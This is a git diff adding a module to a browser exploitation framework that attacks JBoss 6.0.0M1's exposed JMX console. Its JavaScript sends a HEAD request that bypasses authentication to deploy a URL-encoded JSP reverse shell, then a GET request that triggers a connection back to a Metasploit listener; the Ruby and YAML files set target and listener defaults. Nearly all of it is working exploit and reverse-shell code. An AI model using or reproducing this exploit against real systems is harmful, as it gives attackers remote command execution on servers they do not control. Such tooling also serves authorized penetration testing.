diff --git a/modules/network/jboss_jmx_upload_exploit/command.js b/modules/network/jboss_jmx_upload_exploit/command.js
new file mode 100644
index 000000000..ba2ea7d92
--- /dev/null
+++ b/modules/network/jboss_jmx_upload_exploit/command.js
@@ -0,0 +1,40 @@
+/**
+ * Jboss 6.0.0M1 JMX Upload Exploit
+ * Ported from l33tb0y Ruby code in Javascript by antisnatchor.
+ * HEAD request with malicious JSP -> sleep 10 secs -> GET request to deployed JSP -> reverse connection to listening MSF handler
+ *
+ * This is a variation of the JBOSS exploits of Metasploit: instead of deploying a WAR, directly deploy a JSP reverse shell
+ */
+beef.execute(function() {
+
+   rhost = "<%= @rhost %>";
+   rport = "<%= @rport %>";
+   lhost = "<%= @lhost %>";
+   lport = "<%= @lport %>";
+   injectedCommand = "<%= @injectedCommand %>";
+   jspName = "<%= @jspName %>";
+
+   payload = "%3C%25@page%20import=%22java.lang.*%22%25%3E%20%3C%25@page%20import=%22java.util.*%22%25%3E%20%3C%25@page%20import=%22java.io.*%22%25%3E%20%3C%25@page%20import=%22java.net.*%22%25%3E%20%3C%25%20class%20StreamConnector%20extends%20Thread%20%7B%20InputStream%20is;%20OutputStream%20os;%20StreamConnector(%20InputStream%20is,%20OutputStream%20os%20)%20%7B%20this.is%20=%20is;%20this.os%20=%20os;%20%7D%20public%20void%20run()%20%7B%20BufferedReader%20in%20%20=%20null;%20BufferedWriter%20out%20=%20null;%20try%20%7B%20in%20%20=%20new%20BufferedReader(%20new%20InputStreamReader(%20this.is%20)%20);%20out%20=%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.os%20)%20);%20char%20buffer[]%20=%20new%20char[8192];%20int%20length;%20while(%20(%20length%20=%20in.read(%20buffer,%200,%20buffer.length%20)%20)%20%3E%200%20)%20%7B%20out.write(%20buffer,%200,%20length%20);%20out.flush();%20%7D%20%7D%20catch(%20Exception%20e%20)%7B%7D%20try%20%7B%20if(%20in%20!=%20null%20)%20in.close();%20if(%20out%20!=%20null%20)%20out.close();%20%7D%20catch(%20Exception%20e%20)%7B%7D%20%7D%20%7D%20try%20%7B%20Socket%20socket%20=%20new%20Socket(%20%22" + lhost + "%22,%20" + lport + "%20);%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + injectedCommand + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20%25%3E";
+   uri = "/jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=%2Fconsole-mgr.sar/web-console.war%2F&arg1=" + jspName + "&arg2=.jsp&arg3=" + payload + "&arg4=True";
+
+    /* always use dataType: script when doing cross-domain XHR, otherwise even if the HTTP resp is 200, jQuery.ajax will always launch the error() event*/
+	beef.net.request("http", "HEAD", rhost, rport, uri,null, null, 10, 'script', function(response){
+        console.log("jboss HEAD response code [" + response.status_code + "]");
+         if(response.status_code == "success"){
+             function triggerReverseConn(){
+                beef.net.request("http", "GET", rhost, rport,"/web-console/" + jspName + ".jsp", null, null, 10, 'script', function(response){
+                    console.log("jboss GET response code [" + response.status_code + "]");
+                    if(response.status_code == "success"){
+                        beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse JSP shell should have been triggered. Check your MSF handler listener.");
+                    }else{
+                        beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: second GET request failed.");
+                    }
+                });
+             }
+            // give the time to JBoss to deploy the JSP reverse shell
+            setTimeout(triggerReverseConn,10000);
+         }else{
+             beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: first HEAD request failed.");
+         }
+    });
+});
\ No newline at end of file
diff --git a/modules/network/jboss_jmx_upload_exploit/config.yaml b/modules/network/jboss_jmx_upload_exploit/config.yaml
new file mode 100644
index 000000000..430bd9e5c
--- /dev/null
+++ b/modules/network/jboss_jmx_upload_exploit/config.yaml
@@ -0,0 +1,10 @@
+beef:
+    module:
+        jboss_jmx_upload_exploit:
+            enable: true
+            category: "Network"
+            name: "Jboss 6.0.0M1 JMX Deploy Exploit"
+            description: "Deploy a JSP reverse shell (Metasploit one) using the JMX exposed deploymentFileRepository MBean of JBoss. The first request made is a HEAD one to bypass auth and deploy the malicious JSP, the second request is a GET one that triggers the reverse connection to the specified MSF listener.<br>Remember to run the MSF multi/hanlder listener with java/jsp_shell_reverse_tcp as payload."
+            authors: ["antisnatchor", "l33tb0y"]
+            target:
+                working: ["ALL"]
diff --git a/modules/network/jboss_jmx_upload_exploit/module.rb b/modules/network/jboss_jmx_upload_exploit/module.rb
new file mode 100644
index 000000000..f311cfc27
--- /dev/null
+++ b/modules/network/jboss_jmx_upload_exploit/module.rb
@@ -0,0 +1,35 @@
+class Jboss_jmx_upload_exploit < BeEF::Core::Command
+
+  #
+  # Defines and set up the command module.
+  #
+  def initialize
+    super({
+      'Name' => 'Jboss 6.0.0M1 JMX Deploy Exploit',
+      'Description' => 'Deploy a JSP reverse shell (Metasploit one) using the JMX exposed deploymentFileRepository MBean of JBoss. The first request made is a HEAD one to bypass auth and deploy the malicious JSP, the second request is a GET one that triggers the reverse connection to the specified MSF listener.<br>Remember to run the MSF multi/hanlder listener with java/jsp_shell_reverse_tcp as payload.',
+      'Category' => 'Network',
+      'Author' => 'antisnatchor, l33tb0y',
+      'Data' => [
+        {'name' => 'rhost', 'ui_label' => 'Remote Target Host', 'value' => '127.0.0.1'},
+        {'name' => 'rport', 'ui_label' => 'Remote Target Port', 'value' => '8080'},
+        {'name' => 'lhost', 'ui_label' => 'MSF Listener Host', 'value' => '127.0.0.1'},
+        {'name' => 'lport', 'ui_label' => 'MSF Listener Port', 'value' => '6666'},
+        {'name' => 'injectedCommand', 'ui_label' => 'Command to execute', 'value' => 'cmd.exe'},
+        {'name' => 'jspName', 'ui_label' => 'Malicious JSP name', 'value' =>  rand(32**20).to_s(32)}
+      ],
+      'File' => __FILE__
+    })
+
+    set_target({
+      'verified_status' =>  VERIFIED_WORKING,
+      'browser_name' =>     ALL
+    })
+
+    use_template!
+  end
+
+  def callback
+    save({'result' => @datastore['result']})
+  end
+
+end